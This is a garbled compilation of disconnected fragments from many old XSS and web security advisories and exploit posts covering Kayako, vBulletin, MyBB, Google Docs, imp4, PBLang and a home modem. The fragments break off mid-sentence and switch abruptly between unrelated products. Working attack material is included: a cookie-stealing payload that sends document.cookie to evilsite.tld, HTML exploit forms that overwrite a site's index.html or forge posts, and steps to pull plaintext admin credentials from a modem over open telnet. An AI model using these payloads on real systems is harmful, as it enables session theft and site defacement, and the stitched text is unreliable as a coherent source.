html code
---[ Vulnerability description ]
Positive Research Center has discovered multiple XSS vulnerabilities in Kayako Support Suite.
The application insufficiently verifies the incoming subscriberdata parameter in the /staff/index.php?_m=news&_a=importexport script.
An attacker with "staff" privileges can use the vulnerability to inject and execute arbitrary HTML code and scripts in a user's browser within the trust relationship between the browser and the server.
To use the vulnerability, an attacker must convince a user with "staff" privileges to open a URL like:
http://example.com/support/staff/index.php?_m=news&_a=managesubscribers&importsub=1&resultdata=YTo0OntzOjEzOiJzdWNjZXNzZW1haWxzIjtpOjA7czoxMjoiZmFpbGVkZW1haWxzIjtpOjE7czoxMToidG90YWxlbWFpbHMiO2k6MTtzOjk6ImVtYWlsbGlzdCI7czo5MDoiPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD5APHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4uPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4gIjt9
The application insufficiently verifies the incoming subject parameter in the /staff/index.php?_m=news&_a=insertnews script.
An attacker with "staff" privileges can use the vulnerability to inject and execute arbitrary HTML code and scripts in a user's browser within the trust relationship between the browser and the server.
An attacker must trick a user with "staff" privileges into opening a URL like:
server will be the one in charge of processing these requests to create
the 'index.dat.english.pl' file which will be used later to redirect the
victim's browser to the locally stored index.dat file.
However, the main objective of this page is to set (when redirecting to
the next page) HTML code inside the victim's history index.dat file. The
HTML source code to accomplish such tasks would look very much like the
following:
/-----------
I. Description
The Palm Pre WebOS version 1.0.4 and below allows a remote attacker to execute arbitrary HTML code on the phone via certain applications. The affected applications involve the native email client via the notifications system as well as the native calendar application.
The vendor has been contacted and a patch has been released:
WebOS 1.1 - http://kb.palm.com/wps/portal/kb/na/pre/p100eww/sprint/solutions/article/50607_en.html#11
II. Impact
---[ Vulnerability description ]
Positive Research Center has discovered XSS in Kayako Support Suite.
The application insufficiently verifies incoming data in the "Subject" parameter of the LiveSupport module.
An attacker can use the vulnerability to inject and execute HTML code and scripts in a user's browser within the trust relationship between the browser and the server.
The attack succeeds if an administrator deletes a message created by a user via the Delete button in the message's Options section.
The application insufficiently verifies incoming data in the "Full Name" and "Subject" parameters of the Tickets module.
An attacker can use the vulnerability to inject and execute HTML code and scripts in a user's browser within the trust relationship between the browser and the server.
The attack succeeds if an administrator views the task information via the popup menu.
CVE-2008-4182
It was discovered that imp4 suffers from a cross-site scripting (XSS)
attack via the user field in an IMAP session, which allows attackers to
inject arbitrary HTML code.
CVE-2009-0930
It was discovered that imp4 is prone to several cross-site scripting
(XSS) attacks via several vectors in the mail code allowing attackers
##Explanation (translated from German)##:
In vBulletin 3.6.8 there is an XSRF hole that can be used to execute
XSS code. Admins can use HTML code in their own user rank title. An attacker
can exploit this to execute arbitrary HTML/JavaScript code by placing the
code shown above on a page and then sending the admin a private message
with a link to a page containing that HTML code. This makes it possible for
the attacker to steal all the cookies of users who are currently reading a thread in which a
applications.
When the application's view state is not encrypted, it is
possible for an attacker to supply a new or modified view
object as part of a request. The malicious view can contain
arbitrary HTML code (allowing Cross-Site Scripting), and
arbitrary Expression Language (EL) [11] statements that will
be executed on the server. The EL statements can be used to
read data stored in user-scoped session variables, and
application or server-scoped variables. Since these
variables should be inaccessible by the user, it is not
IMPACT: Stored XSS , XSRF , Defacing , etc...
------------------------------------------------------
---Remote XSS Exploit [add comment section]---
The "add comment" section is vulnerable: HTML code can be injected into the comment box and then sent to the server.
URL : http://[TARGET]/[webalbum_PATH]/photo_add-c.php
POST Variable: comment --> XSS Vulnerabilities
POST Variable: id
POST Variable: category
Further research on BladeCenter AMM is strongly encouraged as
this brief overview touched only the surface of the device.
The management module supports a variety of networking protocols
and also contains features from the Telco version. These can be
found by reading the commented-out HTML code. One example feature is
http://1.2.3.4/private/get_telco_system_health_summary
It is also apparent that session timeout is not enforced.
More information:
10. *References*
[1] http://www.sun.com/software/products/calendar_srvr/comms_express/index.xml
[2] HTML Code Injection and Cross-Site Scripting
http://www.technicalinfo.net/papers/CSS.html
[3] The Cross-Site Scripting FAQ (XSS)
http://www.cgisecurity.com/articles/xss-faq.shtml
[4] How to prevent Cross-Site Scripting Security Issues
http://support.microsoft.com/default.aspx?scid=KB;en-us;q252985
An attacker can use a browser to exploit this vulnerability. The following PoC is available:
<form action="http://host/" method="post" name="main" >
<input type="hidden" name="text" value='php and html code of template<script>alert(document.cookie)</script>' />
<input type="hidden" name="file" value="template" />
<input type="hidden" name="action" value="save" />
</form>
<script>
What's the best way to exploit the vulnerability?
1) Make a file named: .j (and upload to a domain which has a name equal to or shorter than 8 characters)
2) The file should contain the following:
HTML Code:
document.location='http://evilsite.tld/cookielogger.php?cookie=' + document.cookie;
3) Sign up and make your first name: (try aff_signup.php to avoid paying!)
"><script src="//evilsite.tld/.j
Google Docs (HTML code) Multiple Cross Site Scripting Vulnerabilities
I. Background:
Google Docs is an online application which makes it possible to "Create and share your work online". You can use it to
create Documents, Presentations, Spreadsheets and Forms.
II. Description:
Multiple cross site scripting vulnerabilities were identified in Google Docs. A remote attacker could write a malformed
document and invite, through Google Docs sharing option, other users to see it in order to obtain their cookies. It's also possible
C) Reflected XSS
________________
The afmsg parameter is not properly sanitised before
being printed. This allows the execution of arbitrary HTML
code.
IV. SAMPLE CODE
_______________
INSERT sql query.
Explanation:
===============
Let's try this little piece of html code as proof-of-concept:
[--------------- PoC start -------------------------------------------------]
<html><body><center>
<form action="http://localhost/mybb.1.2.11/private.php" method="post">
<input type="hidden" name="action" value="do_send">
Exposures project identifies the following problems:
Several cross-site scripting issues via several parameters were
discovered in the CGI scripts, allowing attackers to inject arbitrary
HTML code. In order to cover the different attack vectors, these issues
have been assigned CVE-2007-5624, CVE-2007-5803 and CVE-2008-1360.
For the oldstable distribution (etch), these problems have been fixed in
version 2.6-2+etch4.
PORT STATE SERVICE
23/tcp open telnet
80/tcp open http
Port 80 gives access through an HTML interface to the configuration menu, as would be expected, but although access to that interface can be controlled with a password, there is no control over the telnet port. So, by telnetting to port 23 (on its default IP 192.168.0.1), users automatically get access to the filesystem without providing any credentials at all. The file system of the device may then be used for malicious communication and temporary data storage. Also, a user may download the upgrade firmware's HTML code from the www directory and modify it locally to allow files other than IMGs to be uploaded and replace the existing firmware, making the device useless.
Also, one can view the contents of the /etc/htpasswd file, where everything is stored in plaintext, and retrieve the web-based administrator's (admin) password. Some of the possible implications that can be triggered from the web interface include, but are not limited to, the following:
1. Intruders can now open the configuration page and go through the submenus, where they can obtain the wireless key in use (the wireless key is displayed in plaintext as well).
2. They can perform a trivial DoS attack (a factory restart of the modem stops everything from working); likewise, from the telnet session, issuing the command "reboot" makes the device obey and restart itself.
<!-- This code will rewrite or make "index.html" in http://[target]/[pblang_path] -->
<form action='[target]/ntopic.php?idnum=[idtopic]' name='postmodify' enctype='multipart/form-data' method='POST' onSubmit='submitonce(this);'target='_self'>
<input type='text' name='subject' value='Owned by KiNgOfThEwOrLd's Exploit'>
<input type='hidden' name='fid' value='../../../../index.html\0'>
<input type='hidden' name='cat' value='2' size=40>
<input type='radio' name='topicicon' value='"; [YOUR HTML CODE]' CHECKED>
<textarea name='message' rows='12' cols='60' onselect='storeCaret(this)' onclick='storeCaret(this)' onkeyup='storeCaret(this)'>VISIT Http://www.inj3ct-it.org</textarea>
<input type='hidden' name='gueststatus' value=''>
<input type='checkbox' name='EMNotify'>
<input type='submit' name='Submit' value='Own!'>
</form>
Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )
--------Description--------
It is possible to inject XSS code into the "post" parameter in the
"views/Post/edit/form.php" script.
The "post" parameter is not properly sanitized before being used in HTML
code.
Condition: register_globals: on
--------PoC/Exploit--------
PoC code is available at:
http://evuln.com/vulns/161/exploit.html
---------Solution----------
PoC: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )
--------Description--------
It is possible to inject XSS code into the view parameter in the showflat.pl script.
The view parameter is not sanitized before being used in HTML code.
--------PoC/Exploit--------
PoC code is available at:
http://evuln.com/vulns/157/exploit.html
---------Solution----------
Not available
o The chart tool tip text.
o The href attribute for a chart area.
o The shape attribute for a chart area.
o The coords attribute for a chart area.
It is possible to inject custom HTML code into the code generated by
the JFreeChart library. If a web server uses this library to generate
charts from user-supplied data, an attacker could cause other users of
the same website or application to execute arbitrary JavaScript code
when viewing a page containing a chart.
option needs to be activated:
'http://victim/vBulletin/profile.php?do=editoptions' (Show New Private
Message Notification Pop-Up enabled). There are many forums with this
option enabled by default for all new users.
The title is not being encoded in the following rendered HTML code:
/-----------
<!--
// script to show new private message popup
opac-downloadshelf.pl
opac-review.pl
opac-sendshelf.pl
opac-serial-issues.pl
An attacker can use the vulnerability to inject and execute arbitrary HTML code and scripts in a user's browser within the trust relationship between the browser and the server.
---[ How to fix ]
Update your software to the latest version.
8. *Technical Description / Proof of Concept Code*
This vulnerability is triggered because the 'mode' parameter of the
'media-rss.php' script is not correctly escaped to avoid HTML code
injection.
/-----
$mode = $_GET["mode"];
-----/
PoC: Not available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )
--------Description--------
It is possible to inject XSS code into the title parameter in the views/Thread/display/top.php script.
The title parameter is not properly sanitized before being used in HTML code.
Condition: register_globals: on
--------PoC/Exploit--------
PoC code is available at:
http://evuln.com/vulns/159/exploit.html
[8] included a patch to fix the bug reported in CORE-2008-0826. The fix
was implemented as a modification to the MIME-type detection method when
loading content specified in an 'OBJECT' tag. Thus, the contents of the
index.dat file will not be rendered and shown to an Internet Explorer
user if it is directly referenced from a webpage with the following HTML
code:
/-----
<object data="file://127.0.0.1/C$/.../index.dat"
type="text/html"
width="100%" height="50"
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )
--------Description--------
It is possible to inject XSS code into the "title" and "url" parameters in the save.php script.
The "title" and "url" parameters are not properly sanitized before being used in HTML code.
--------PoC/Exploit--------
PoC code is available at:
http://evuln.com/vulns/164/exploit.html